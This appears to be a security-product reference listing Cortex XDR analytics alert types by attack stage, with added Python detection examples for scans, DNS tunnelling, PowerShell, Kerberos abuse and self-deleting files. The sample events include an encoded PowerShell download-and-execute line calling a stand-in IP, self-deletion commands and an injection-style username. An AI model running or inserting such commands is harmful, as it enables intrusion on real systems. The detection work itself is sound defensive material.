Analytics Alert Types

Cortex XDR Analytics alerts grouped by attack category.
Cortex XDR Analytics alerts are categorized by the individual step of the attack lifecycle in which the detected activity occurs.
The alerts you see in Cortex XDR depend on the log sources you have set up. For example, if Cortex XDR agent endpoint data is your only data source, the app raises only the alerts it can detect from agent endpoint data.
The alerts the app can raise, by category, are:
Each alert is raised from one or more of the following data sources (the columns of the original table):
Palo Alto Networks sources: Firewall Traffic Logs; Firewall EAL Logs; GlobalProtect and Prisma Access Logs; Cortex XDR Agent Endpoint Data.
External sources: Check Point, Cisco, and Fortinet Firewall Traffic Logs; Windows Event Collector Logs.
For every alert below, "Data sources: N of 6" is the number of these sources the table marked for that alert. Where the table marked a source as only increasing accuracy, or as providing limited coverage, this is noted as well.
Execution

Grayware
The app identified a suspicious file based on the network traffic the file generates, threat intelligence, the prevalence of the file across endpoints on your network, or endpoint activity reported by the Cortex XDR agent. Automated investigation of the file by WildFire classified it as grayware.
Data sources: 3 of 6.

Malware
The app identified a suspicious file on an endpoint based on threat intelligence, the file generating suspicious network traffic, or endpoint activity logged by the Cortex XDR agent. Automated investigation of the file by WildFire classified it as malware.
Data sources: 4 of 6.

Rare WinRM Session
The app detected a process that performed a rare Windows Remote Management (WinRM) session to a remote endpoint and port.
Data sources: 1 of 6.

Script Connecting to Rare External Host
The app identified a scripting host process (wscript.exe, cscript.exe, or powershell.exe) connecting to an uncommon external endpoint.
Data sources: 1 of 6.

scrcons.exe Rare Child Process
The app identified that scrcons.exe, the WMI ActiveScript event consumer host, spawned a child process on an endpoint, which may indicate remote code execution abuse by an attacker.
Data sources: 1 of 6.

SpamBot Traffic
A device that is not an SMTP server appears to be sending spam.
Data sources: 5 of 6.

Suspicious PowerShell Command Line
The app identified PowerShell being executed with a suspicious command line, which may include command obfuscation, encoding, or reflective assembly loading.
Data sources: 1 of 6.

Uncommon Remote Scheduled Task Creation via schtasks.exe
The app identified the uncommon scheduling of a task on a remote endpoint.
Data sources: 1 of 6.

Uncommon Remote Service Start via sc.exe
The app identified that the Service Control (sc.exe) command was used to start a service on a remote endpoint.
Data sources: 1 of 6.

Uncommon Service Create/Config
The app identified that the Service Control (sc.exe) command was used to create a new service or to change the configuration of an existing one.
Data sources: 1 of 6.
Persistence

Uncommon Local Scheduled Task Creation via schtasks.exe
The app detected an uncommon locally scheduled task on an endpoint.
Data sources: 1 of 6.

Uncommon Net User
The app detected that the net user command was executed on an endpoint on which it is not commonly used.
Data sources: 1 of 6.
Discovery

Failed Connections
The app detected an endpoint that is generating an abnormally high number of failed connections to other endpoints that have been inactive for a long time or were never on the network to begin with.
Data sources: 5 of 6 (one of them only increases accuracy).

High Connection Rate
The app identified a number of successful connections to a list of susceptible ports at a rate that is unusual compared to the baseline. This could be the consequence of an attacker scraping an endpoint for data or attempting a brute-force attack on user and password combinations.
Data sources: 3 of 6.

Port Scan
The app detected port-scanning activity that exceeds the baseline for that endpoint and endpoint type.
Data sources: 4 of 6.

Uncommon ARP Cache Listing via arp.exe
The app detected an uncommon listing of the ARP cache through the arp.exe command on an endpoint.
Data sources: 1 of 6.

Suspicious PowerShell Enumeration of Running Processes
The app detected a command executed in PowerShell that enumerates running processes.
Data sources: 1 of 6.

Uncommon IP Configuration Listing via ipconfig.exe
The app detected that the ipconfig command was used on an endpoint to list the IP address configuration of all network adapters, which reveals network configuration details.
Data sources: 1 of 6.

Uncommon Routing Table Listing via route.exe
The app detected that the route.exe command was used to display or modify the local IP routing table.
Data sources: 1 of 6.

Uncommon Net Group Execution
The app detected that the net group command was used on an endpoint on which it is not commonly used.
Data sources: 1 of 6.

Uncommon net localgroup Execution
The app detected that the net localgroup command was used on an endpoint on which it is not commonly used.
Data sources: 1 of 6.

Uncommon Net User
The app detected that the net user command was executed on an endpoint on which it is not commonly used.
Data sources: 1 of 6.
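The Failed Connections and Port Scan rows both compare a per-endpoint count against that endpoint's own history. The following is an added example, not Cortex XDR code, showing that comparison over constructed flow records: one metric counts distinct destination ports a source tried in a day, the other counts destination hosts to which every connection that day failed, and each is compared against a median of the source's earlier days. The record layout, the median baseline and the thresholds (a fixed floor of 20 and 5x the baseline) are assumptions, not the product's logic.

```python
"""Added example (not Cortex XDR code): the baseline comparison behind the
"Port Scan" and "Failed Connections" alerts, run over constructed flow records.
The metrics, the per-source median baseline and the thresholds are assumptions."""
from collections import defaultdict
from statistics import median


def build_sample_flows():
    """Constructed flow records: (day, src_ip, dst_ip, dst_port, succeeded)."""
    flows = []
    for day in range(1, 9):                                   # 8 days of routine traffic to one server
        for src in ("10.0.0.5", "10.0.0.9"):
            for port in (53, 80, 443, 445, 3389):
                flows.append((day, src, "10.0.0.1", port, True))
    for port in range(1, 201):                                # day 8: 10.0.0.5 sweeps 200 ports on one host
        flows.append((8, "10.0.0.5", "10.0.0.2", port, False))
    for i in range(1, 51):                                    # day 8: 10.0.0.9 probes 50 addresses nobody answers on
        flows.append((8, "10.0.0.9", f"10.0.1.{i}", 445, False))
    return flows


def daily_stats(flows):
    """Per (day, src): distinct destination ports tried, and hosts that only ever failed that day."""
    ports, failed, succeeded = defaultdict(set), defaultdict(set), defaultdict(set)
    for day, src, dst, port, ok in flows:
        ports[(day, src)].add(port)
        (succeeded if ok else failed)[(day, src)].add(dst)
    return {key: {"distinct_ports": len(ports[key]),
                  "failed_hosts": len(failed[key] - succeeded[key])} for key in ports}


def anomalies(stats, current_day, metric, factor=5, floor=20):
    """Sources whose metric today exceeds both a fixed floor and factor x their own historical median."""
    alerts = {}
    for src in sorted({src for (_, src) in stats}):
        history = [v[metric] for (day, s), v in stats.items() if s == src and day < current_day]
        baseline = median(history) if history else 0
        today = stats.get((current_day, src), {}).get(metric, 0)
        if today > max(floor, factor * baseline):
            alerts[src] = (today, baseline)
    return alerts


FLOWS = build_sample_flows()
STATS = daily_stats(FLOWS)

if __name__ == "__main__":
    print("Port Scan:", anomalies(STATS, 8, "distinct_ports"))
    print("Failed Connections:", anomalies(STATS, 8, "failed_hosts"))
```

The floor matters as much as the multiplier: a host whose baseline is zero (it never failed a connection before) would otherwise alert on a single failure, and a host with a naturally high baseline (a vulnerability scanner) needs the multiplier rather than an absolute count to stay quiet.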
Lateral Movement

High Connection Rate
The app identified a number of successful connections to a list of susceptible ports at a rate that is unusual compared to the baseline. This could be the consequence of an attacker scraping an endpoint for data or attempting a brute-force attack on user and password combinations.
This alert can also relate to the discovery tactic.
Data sources: 3 of 6.

New Administrative Behavior
The app detected administrative activity from an endpoint that does not usually engage in that behavior, which typically means that an attacker is trying to move laterally across the network.
This alert can also relate to an attacker's reconnaissance of your network.
Data sources: 5 of 6 (one of them only increases accuracy; one provides limited coverage).

Rare SSH Session
The app detected a process that performed a rare Secure Shell (SSH) session, running with NT AUTHORITY\SYSTEM privileges, to a remote endpoint and port.
Data sources: 1 of 6.

Rare WinRM Session
The app detected a process that performed a rare Windows Remote Management (WinRM) session to a remote endpoint and port.
Data sources: 1 of 6.

Remote Command Execution
The app detected an account using remote command execution from an endpoint that historically does not perform that activity.
Data sources: 3 of 6 (one of them only increases accuracy).

SMB/KRB Traffic from Non-Standard Process
The app detected a process connecting over the ports normally used by SMB or Kerberos. Either the process is using a custom protocol implementation, or it is not using the expected protocol on those ports.
Data sources: 3 of 6.

wmiprvse.exe Rare Child Process
The app detected that a remote WMI command, executed through the WMI provider host wmiprvse.exe, spawned a rare child process.
Data sources: 1 of 6.

wsmprovhost.exe Rare Child Process
The app detected that a remote WinRM (PowerShell remoting) command, executed through the WS-Management provider host wsmprovhost.exe, spawned a rare child process.
Data sources: 1 of 6.
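New Administrative Behavior and Remote Command Execution are novelty detections: the question is not "how much" but "has this source done this before". The following is an added example, not Cortex XDR code, that learns which hosts (and which host per account) performed remote administration during a learning period and then flags activity from sources outside that baseline. The record layout, the 30-day learning period and the requirement that a host be seen on at least 3 distinct days before it counts as known are assumptions; the support threshold is there so a single one-off event during learning does not whitelist a host forever.

```python
"""Added example (not Cortex XDR code): the learned-baseline idea behind the
"New Administrative Behavior" and "Remote Command Execution" alerts, run over
constructed remote-administration records. Field names and thresholds are assumptions."""
from collections import defaultdict


def build_sample_records():
    """Constructed records: (day, account, src_host, dst_host, method)."""
    recs = []
    for day in range(1, 31):                      # 30-day learning period: one jump host does all admin work
        recs.append((day, "CORP\\it-admin", "JUMP01", f"SRV{day % 5:02d}", "winrm"))
    recs.append((5, "CORP\\it-admin", "WS-HR-02", "SRV01", "winrm"))     # one-off during learning, below support
    recs.append((31, "CORP\\it-admin", "JUMP01", "SRV01", "psexec"))     # known host, known account
    recs.append((31, "CORP\\jdoe", "WS-FIN-17", "SRV03", "wmi"))         # workstation never seen administering
    recs.append((31, "CORP\\it-admin", "WS-HR-02", "SRV04", "winrm"))    # admin account from an unfamiliar host
    return recs


def learn_baseline(records, learn_until, min_days=3):
    """Hosts (and per-account hosts) that performed remote admin on at least min_days distinct days."""
    host_days = defaultdict(set)
    account_host_days = defaultdict(set)
    for day, account, src, _dst, _method in records:
        if day <= learn_until:
            host_days[src].add(day)
            account_host_days[(account, src)].add(day)
    admin_hosts = {host for host, days in host_days.items() if len(days) >= min_days}
    account_hosts = defaultdict(set)
    for (account, src), days in account_host_days.items():
        if len(days) >= min_days:
            account_hosts[account].add(src)
    return admin_hosts, account_hosts


def detect(records, learn_until, min_days=3):
    """Alert tuples for every record after the learning period that breaks the baseline."""
    admin_hosts, account_hosts = learn_baseline(records, learn_until, min_days)
    alerts = []
    for day, account, src, dst, method in records:
        if day <= learn_until:
            continue
        if src not in admin_hosts:                                # this host never administers anything
            alerts.append(("New Administrative Behavior", src, dst, method))
        if src not in account_hosts.get(account, set()):          # this account never used this host for it
            alerts.append(("Remote Command Execution", account, src, dst))
    return alerts


if __name__ == "__main__":
    for alert in detect(build_sample_records(), learn_until=30):
        print(alert)
```

Running it with `min_days=1` instead of 3 shows why the support threshold exists: the single day-5 event from WS-HR-02 would then make that workstation a "known" admin host and the day-31 activity from it would pass silently.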
Command and Control

DNS Tunneling
The app detected an endpoint sending and receiving anomalous DNS queries and responses.
Data sources: 3 of 6.

Failed DNS
The app detected an endpoint that is performing an unusually large number of failed DNS resolutions compared to its peer group.
Data sources: 3 of 6.

Random Looking DNS
The app detected an endpoint that is performing DNS lookups for a large number of unique, apparently random root domain names.
Data sources: 3 of 6.

Recurring Rare Domain Access
The app detected an endpoint that is connecting repeatedly to an external domain in a way that suggests the remote domain is performing malware command and control.
Data sources: 3 of 6.

Recurring Rare IP Access
The app detected an endpoint that is connecting repeatedly to an external IP address in a way that suggests the remote endpoint is performing malware command and control.
Data sources: 5 of 6.

Tunneling Process
The app detected an endpoint that has open internal ports at the same time that it is communicating with a destination on the internet.
Data sources: 3 of 6.

LOLBIN Connecting to a Rare Host
The app detected a living-off-the-land binary (LOLBIN) communicating with an external host or domain that hosts in your organization rarely access.
Data sources: 1 of 6.
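Random Looking DNS and DNS Tunneling are both judgements about the shape of query names, so they share one scoring helper. The following is an added example, not Cortex XDR code, that scores root-domain labels for DGA-style randomness (length, character entropy, vowel ratio) and subdomain labels for tunnelling (long, high-entropy labels repeated under one root), then aggregates per endpoint over a constructed set of queries. The thresholds, the vowel-ratio heuristic and the two-label root split (no public-suffix list, so co.uk-style names split wrong) are assumptions.

```python
"""Added example (not Cortex XDR code): per-endpoint scoring of DNS query names
for the "Random Looking DNS" and "DNS Tunneling" alerts, run over constructed
queries. Thresholds and the two-label root-domain split are assumptions."""
import hashlib
import math
from collections import defaultdict


def shannon_entropy(text):
    """Bits per character of the string's character distribution."""
    if not text:
        return 0.0
    counts = {}
    for ch in text:
        counts[ch] = counts.get(ch, 0) + 1
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_name(qname):
    """Return (subdomain, root), treating the last two labels as the root domain."""
    labels = qname.rstrip(".").lower().split(".")
    if len(labels) < 2:
        return "", qname.lower()
    return ".".join(labels[:-2]), ".".join(labels[-2:])


def looks_random(label, min_len=12, min_entropy=3.0, max_vowel_ratio=0.3):
    """DGA-style label: long, high entropy, and fewer vowels than natural words have."""
    core = label.replace("-", "")
    if len(core) < min_len:
        return False
    vowels = sum(ch in "aeiou" for ch in core)
    return shannon_entropy(core) >= min_entropy and vowels / len(core) < max_vowel_ratio


def tunnel_like(subdomain, min_label_len=30, min_entropy=3.0):
    """Tunnel payloads ride in long, high-entropy subdomain labels."""
    if not subdomain:
        return False
    longest = max(subdomain.split("."), key=len)
    return len(longest) >= min_label_len and shannon_entropy(longest) >= min_entropy


def analyze(queries, random_roots_threshold=4, tunnel_threshold=5):
    """Return alert tuples for (src_ip, qname) records."""
    random_roots = defaultdict(set)     # endpoint -> distinct random-looking root domains
    tunnel_hits = defaultdict(int)      # (endpoint, root) -> tunnel-shaped queries
    for src, qname in queries:
        sub, root = split_name(qname)
        if looks_random(root.split(".")[0]):
            random_roots[src].add(root)
        if tunnel_like(sub):
            tunnel_hits[(src, root)] += 1
    alerts = []
    for src, roots in sorted(random_roots.items()):
        if len(roots) >= random_roots_threshold:
            alerts.append(("Random Looking DNS", src, len(roots)))
    for (src, root), n in sorted(tunnel_hits.items()):
        if n >= tunnel_threshold:
            alerts.append(("DNS Tunneling", src, root, n))
    return alerts


def build_sample_queries():
    """Constructed sample: one host tunnelling data, one host resolving DGA-style names."""
    q = [("10.0.0.7", "www.example.com"), ("10.0.0.7", "login.microsoftonline.com"),
         ("10.0.0.7", "cdn.jsdelivr.net"), ("10.0.0.8", "www.example.com")]
    for i in range(6):   # exfil chunks encoded as 48-hex-char labels under one root domain
        chunk = hashlib.sha256(f"chunk-{i}".encode()).hexdigest()[:48]
        q.append(("10.0.0.7", f"{chunk}.t.example.net"))
    for root in ("x7k2q9vb4mzp.com", "h3j8d0f5g2k1.net", "w9z4n6t1b8c3.org", "m2p7r5s0v8q6.info"):
        q.append(("10.0.0.8", f"api.{root}"))
    return q


if __name__ == "__main__":
    for alert in analyze(build_sample_queries()):
        print(alert)
```

The vowel-ratio check is what keeps long legitimate names such as microsoftonline (entropy above 3.2 bits) out of the random bucket; entropy alone is a weak discriminator for names longer than a dozen characters.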
Exfiltration

DNS Tunneling
The app detected an endpoint sending and receiving anomalous DNS queries and responses.
Data sources: 3 of 6.

Large Upload (FTP)
The app detected excessively large data transfers over FTP from a source that is not an FTP server.
Data sources: 3 of 6 (one of them only increases accuracy).

Large Upload (Generic)
The app detected abnormally large data traffic to an external destination over a protocol other than HTTP(S), FTP, or SMTP.
Data sources: 4 of 6 (one of them only increases accuracy).

Large Upload (HTTPS)
The app detected excessively large data transfers over HTTPS from a source that is not an HTTP server.
Data sources: 3 of 6.

Large Upload (SMTP)
The app detected abnormally large data transfers over SMTP compared to historical traffic volumes for machines of this type.
Data sources: 3 of 6 (one of them only increases accuracy).

Rare SMTP/S Session
The app detected a process performing a rare Simple Mail Transfer Protocol (SMTP/S) session to a remote endpoint and port.
Data sources: 1 of 6.
Initial Access

Microsoft Office Process Spawning a Suspicious One-Liner
The app detected a Microsoft Office process that spawned a suspicious one-line command.
Data sources: 1 of 6.
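This row and the Suspicious PowerShell Command Line row under Execution are both decisions about a single process-creation event: the parent/child pair, and what the command line contains. The following is an added example, not Cortex XDR code, that implements both on constructed events. It decodes an `-EncodedCommand` payload (base64 of UTF-16LE text) so that markers hidden inside it count, looks for the markers the row names (encoding, obfuscation, reflective assembly loading) plus a few companions, and flags an Office parent spawning a command-line host. The event field names, the marker list and the rule that at least two markers are needed before alerting are assumptions.

```python
"""Added example (not Cortex XDR code): process-creation heuristics for the
"Suspicious PowerShell Command Line" and "Microsoft Office Process Spawning a
Suspicious One-Liner" alerts. Event records, field names and the two-marker
threshold are constructed assumptions."""
import base64
import binascii
import re

OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
ONE_LINER_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                   "mshta.exe", "rundll32.exe", "regsvr32.exe"}

# -e / -enc / -EncodedCommand followed by a base64 blob (PowerShell accepts unambiguous prefixes).
ENCODED_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")
MARKERS = [
    (re.compile(r"(?i)\[(?:System\.)?Reflection\.Assembly\]::Load"), "reflective assembly load"),
    (re.compile(r"(?i)\bIEX\b|Invoke-Expression"), "Invoke-Expression"),
    (re.compile(r"(?i)(?:^|\s)-(?:w|win|windowstyle)\s+hidden"), "hidden window"),
    (re.compile(r"(?i)(?:^|\s)-(?:nop|noprofile)\b"), "no profile"),
    (re.compile(r"(?i)FromBase64String"), "embedded base64 payload"),
    (re.compile(r"(?i)DownloadString|DownloadFile|Net\.WebClient|Invoke-WebRequest|\biwr\b"), "in-memory download"),
    (re.compile(r"(?:`[A-Za-z]){3,}|['\"]\s*\+\s*['\"]"), "string or backtick obfuscation"),
]


def decode_encoded_command(cmdline):
    """Decode the -EncodedCommand payload (base64 of UTF-16LE) or return None."""
    m = ENCODED_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError):
        return None


def powershell_findings(cmdline):
    """Marker names present in the visible command line and in its decoded payload."""
    findings = []
    decoded = decode_encoded_command(cmdline)
    if decoded is not None:
        findings.append("encoded command")
    visible = ENCODED_FLAG.sub(" ", cmdline)          # do not pattern-match inside the base64 blob
    for text in (visible, decoded or ""):
        for pattern, name in MARKERS:
            if name not in findings and pattern.search(text):
                findings.append(name)
    return findings


def evaluate(event):
    """Alert names one process-creation event would raise."""
    image = event["image"].lower()
    parent = event["parent_image"].lower()
    cmdline = event["cmdline"]
    alerts = []
    if image in {"powershell.exe", "pwsh.exe"} or "powershell" in cmdline.lower():
        if len(powershell_findings(cmdline)) >= 2:        # one marker alone (e.g. -nop) is too noisy
            alerts.append("Suspicious PowerShell Command Line")
    if parent in OFFICE_PARENTS and image in ONE_LINER_HOSTS:
        alerts.append("Microsoft Office Process Spawning a Suspicious One-Liner")
    return alerts


# Constructed sample events (not real telemetry); the encoded payload is built so it decodes.
PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.5/s')"
ENCODED = base64.b64encode(PAYLOAD.encode("utf-16-le")).decode()
SAMPLE_EVENTS = [
    {"parent_image": "explorer.exe", "image": "powershell.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\scripts\backup.ps1"},
    {"parent_image": "explorer.exe", "image": "powershell.exe",
     "cmdline": f"powershell.exe -nop -w hidden -enc {ENCODED}"},
    {"parent_image": "WINWORD.EXE", "image": "cmd.exe",
     "cmdline": 'cmd.exe /c powershell -w hidden -c "[Reflection.Assembly]::Load([Convert]::FromBase64String($b))"'},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["image"], "->", evaluate(ev) or "no alert")
```

Decoding before matching is the part that matters: the second sample event shows nothing suspicious beyond `-nop -w hidden` until the payload is decoded, and an attacker who double-encodes or uses `-c` with a compressed stream will still get past this simple version, which is why the product combines it with the other process-based rows rather than relying on it alone.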
Credential Access

Possible DC Sync Attempt
The app detected Active Directory replication between a domain controller (DC) and a host that is not a DC, with the non-DC host requesting directory data from the DC.
Data sources: 3 of 6.

Failed Login for a Long Username with Special Characters
The app detected a failed domain login attempt for a long username (more than 15 characters) containing special characters; the attempt failed because the username does not exist in the Kerberos database.
Data sources: 3 of 6.

Kerberos Pre-Auth Failures by Host
The app detected a suspicious number of failed Kerberos pre-authentication attempts for multiple users from a single host, which can indicate a password-spraying attack.
Data sources: 3 of 6.

Kerberos Pre-Auth Failures by User and Host
The app detected a suspicious number of failed Kerberos pre-authentication attempts for a single user from a single host.
Data sources: 3 of 6.

Weakly-Encrypted Kerberos Ticket Requested
The app detected a user requesting a weakly-encrypted Kerberos ticket-granting service (TGS) ticket, which could potentially be cracked offline.
Data sources: 4 of 6.

Multiple Weakly-Encrypted Kerberos Tickets Received
The app detected a user accessing, over a short period of time, multiple services associated with user accounts that the user had not accessed before.
Data sources: 3 of 6.

Possible Search For Password Files
The app detected a possible search for files that contain passwords.
Data sources: 1 of 6.

Possible DCShadow Attempt
The app detected Active Directory replication taking place between a domain controller (DC) and a host that is not a DC, with the non-DC host pushing changes to the DC as if it were a domain controller.
Data sources: 3 of 6.
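Several of the Kerberos rows above are counting and filtering rules over domain-controller security events: 4771 (pre-authentication failed) with status 0x18 for the two pre-auth failure alerts, 4768 (TGT requested) with result 0x6, KDC_ERR_C_PRINCIPAL_UNKNOWN, for the long-username alert, and 4769 (TGS requested) with an RC4 encryption type (0x17 or 0x18) for the two weakly-encrypted ticket alerts. The following is an added example, not Cortex XDR code, that applies those rules to constructed event dicts using the real field names of those events. The thresholds, the treatment of all events as one time window, and the definition of "special characters" are assumptions.

```python
"""Added example (not Cortex XDR code): checks over Windows Security events for the
Kerberos alerts above. Events are constructed dicts using the real field names of
events 4768, 4769 and 4771; the thresholds and the one-window scope are assumptions."""
from collections import defaultdict

PREAUTH_FAILED = "0x18"        # 4771 Status: KDC_ERR_PREAUTH_FAILED (wrong password)
PRINCIPAL_UNKNOWN = "0x6"      # 4768 Status: KDC_ERR_C_PRINCIPAL_UNKNOWN (no such user)
RC4_ETYPES = {"0x17", "0x18"}  # 4769 TicketEncryptionType: RC4-HMAC / RC4-HMAC-EXP


def is_long_special_username(name):
    """Assumed definition: over 15 characters and containing something other than [A-Za-z0-9._-]."""
    return len(name) > 15 and any(not ch.isalnum() and ch not in "._-" for ch in name)


def analyze(events, spray_users=10, brute_attempts=10, multi_tgs=3):
    """Return alert tuples for one time window of events."""
    users_by_host = defaultdict(set)          # pre-auth failures: source -> distinct users
    attempts_by_user_host = defaultdict(int)  # pre-auth failures: (user, source) -> count
    rc4_services_by_user = defaultdict(set)   # RC4 TGS requests: requester -> service accounts
    alerts = []
    for ev in events:
        eid = ev["EventID"]
        if eid == 4771 and ev["Status"] == PREAUTH_FAILED:
            users_by_host[ev["IpAddress"]].add(ev["TargetUserName"])
            attempts_by_user_host[(ev["TargetUserName"], ev["IpAddress"])] += 1
        elif eid == 4768 and ev["Status"] == PRINCIPAL_UNKNOWN and is_long_special_username(ev["TargetUserName"]):
            alerts.append(("Failed Login for a Long Username with Special Characters",
                           ev["TargetUserName"], ev["IpAddress"]))
        elif eid == 4769 and ev["TicketEncryptionType"] in RC4_ETYPES and not ev["ServiceName"].endswith("$"):
            # RC4 service ticket for an SPN on a user account: the ticket is crackable offline (Kerberoasting).
            # Machine accounts (ending in $) have random passwords and are skipped.
            alerts.append(("Weakly-Encrypted Kerberos Ticket Requested", ev["TargetUserName"], ev["ServiceName"]))
            rc4_services_by_user[ev["TargetUserName"]].add(ev["ServiceName"])
    for host, users in users_by_host.items():
        if len(users) >= spray_users:
            alerts.append(("Kerberos Pre-Auth Failures by Host", host, len(users)))
    for (user, host), n in attempts_by_user_host.items():
        if n >= brute_attempts:
            alerts.append(("Kerberos Pre-Auth Failures by User and Host", user, host, n))
    for user, services in rc4_services_by_user.items():
        if len(services) >= multi_tgs:
            alerts.append(("Multiple Weakly-Encrypted Kerberos Tickets Received", user, len(services)))
    return alerts


def build_sample_events():
    """Constructed events: a spray, a brute force, an injection-style username, and a Kerberoast."""
    ev = []
    for i in range(12):    # password spray: many users, one source, one failure each
        ev.append({"EventID": 4771, "TargetUserName": f"user{i:02d}", "IpAddress": "10.0.0.50", "Status": "0x18"})
    for _ in range(15):    # brute force: one user, one source, repeated failures
        ev.append({"EventID": 4771, "TargetUserName": "jdoe", "IpAddress": "10.0.0.51", "Status": "0x18"})
    ev.append({"EventID": 4768, "TargetUserName": "bob.smith", "IpAddress": "10.0.0.52", "Status": "0x6"})
    ev.append({"EventID": 4768, "TargetUserName": "user<script>alert(1)</script>",
               "IpAddress": "10.0.0.52", "Status": "0x6"})
    for svc in ("svc_sql", "svc_web", "svc_backup"):   # Kerberoasting: RC4 tickets for user-account SPNs
        ev.append({"EventID": 4769, "TargetUserName": "mallory", "ServiceName": svc,
                   "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.53"})
    ev.append({"EventID": 4769, "TargetUserName": "mallory", "ServiceName": "DC01$",
               "TicketEncryptionType": "0x17", "IpAddress": "10.0.0.53"})   # machine account: ignored
    ev.append({"EventID": 4769, "TargetUserName": "alice", "ServiceName": "svc_sql",
               "TicketEncryptionType": "0x12", "IpAddress": "10.0.0.54"})   # AES256: fine
    return ev


if __name__ == "__main__":
    for alert in analyze(build_sample_events()):
        print(alert)
```

The spray and brute-force rules are deliberately split by the two different keys (distinct users per source versus attempts per user and source), which is why the page lists them as separate alerts: a spray produces one failure per user and never trips a per-user lockout threshold.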
Defense Evasion

Authentication Attempt From a Dormant Account
The app detected a user account that has been dormant for a year or more attempting to authenticate to a service using a Kerberos TGT (ticket-granting ticket).
Data sources: 4 of 6.

Failed Login For Locked-Out Account
The app detected a revoked (locked-out) user account attempting to authenticate using Kerberos pre-authentication.
Data sources: 4 of 6.

Delayed Deletion of Files
The app detected a command line that deletes files after using the timeout or ping command to delay the deletion.
Data sources: 1 of 6.

Possible DCShadow Attempt
The app detected Active Directory replication taking place between a domain controller (DC) and a host that is not a DC, with the non-DC host pushing changes to the DC as if it were a domain controller.
Data sources: 3 of 6.

Unicode RTL Override Character
The app detected the execution of a process whose file name contains the Unicode right-to-left override character (U+202E), which reverses the display of everything after it and so disguises the file's real extension.
Data sources: 1 of 6.
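The Delayed Deletion of Files and Unicode RTL Override Character rows are both pure command-line and file-name checks, so they can be shown together. The following is an added example, not Cortex XDR code: it flags a delete (cmd.exe built-ins or Remove-Item) that follows a timeout or ping in the same command line, which is the pattern a dropper uses to remove itself after its parent exits, and it reports how a file name containing U+202E is displayed versus what its real extension is. The sample command lines and paths are constructed.

```python
"""Added example (not Cortex XDR code): command-line and file-name checks behind the
"Delayed Deletion of Files" and "Unicode RTL Override Character" alerts. The sample
command lines and paths are constructed."""
import re

RTL_OVERRIDE = "\u202e"   # Unicode RIGHT-TO-LEFT OVERRIDE

# A delay: "timeout [/t] N" or any "ping ..." invocation up to the next command separator.
DELAY_CMD = re.compile(r"(?i)\b(?:timeout(?:\.exe)?\s+(?:/t\s+)?\d+|ping(?:\.exe)?\s[^&|]*)")
# A deletion: cmd.exe built-ins or the PowerShell cmdlet.
DELETE_CMD = re.compile(r"(?i)\b(?:del|erase|rd|rmdir)\b|Remove-Item\b")


def is_delayed_deletion(cmdline):
    """True when a delay command precedes a delete in the same command line."""
    delay = DELAY_CMD.search(cmdline)
    return delay is not None and DELETE_CMD.search(cmdline, delay.end()) is not None


def rtl_override_findings(path):
    """Describe how an RTL-override file name renders versus what it really is, or None."""
    name = path.replace("\\", "/").rsplit("/", 1)[-1]
    if RTL_OVERRIDE not in name:
        return None
    before, after = name.split(RTL_OVERRIDE, 1)
    return {"displayed_as": before + after[::-1],          # the renderer reverses everything after U+202E
            "real_extension": name.rsplit(".", 1)[-1].lower()}


def evaluate(image_path, cmdline):
    """Alert names one process-creation event (image path plus command line) would raise."""
    alerts = []
    if is_delayed_deletion(cmdline):
        alerts.append("Delayed Deletion of Files")
    if rtl_override_findings(image_path) is not None:
        alerts.append("Unicode RTL Override Character")
    return alerts


# Constructed sample events: (image_path, cmdline).
SAMPLE_EVENTS = [
    (r"C:\Windows\System32\cmd.exe", r'cmd.exe /c ping 127.0.0.1 -n 5 > nul & del /f /q "C:\Users\Public\stage.exe"'),
    (r"C:\Windows\System32\cmd.exe", r"cmd.exe /c timeout /t 3 & del C:\Windows\Temp\a.dll"),
    (r"C:\Windows\System32\cmd.exe", r"cmd.exe /c del C:\Temp\old.log"),          # delete without delay
    (r"C:\Windows\System32\cmd.exe", r"cmd.exe /c ping 8.8.8.8 -n 4"),            # delay without delete
    ("C:\\Users\\alice\\Downloads\\invoice_\u202efdp.exe", "invoice_\u202efdp.exe"),  # shown as invoice_exe.pdf
]

if __name__ == "__main__":
    for path, cmd in SAMPLE_EVENTS:
        print(evaluate(path, cmd) or "no alert", "|", rtl_override_findings(path) or cmd)
```

The ordering check (delete only counts after the delay) is what separates self-deleting droppers from the common and harmless "delete then wait" batch idiom; the RTL check is intentionally on the executed image path rather than on the command line, because the override character is in the file name on disk, not in the arguments.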
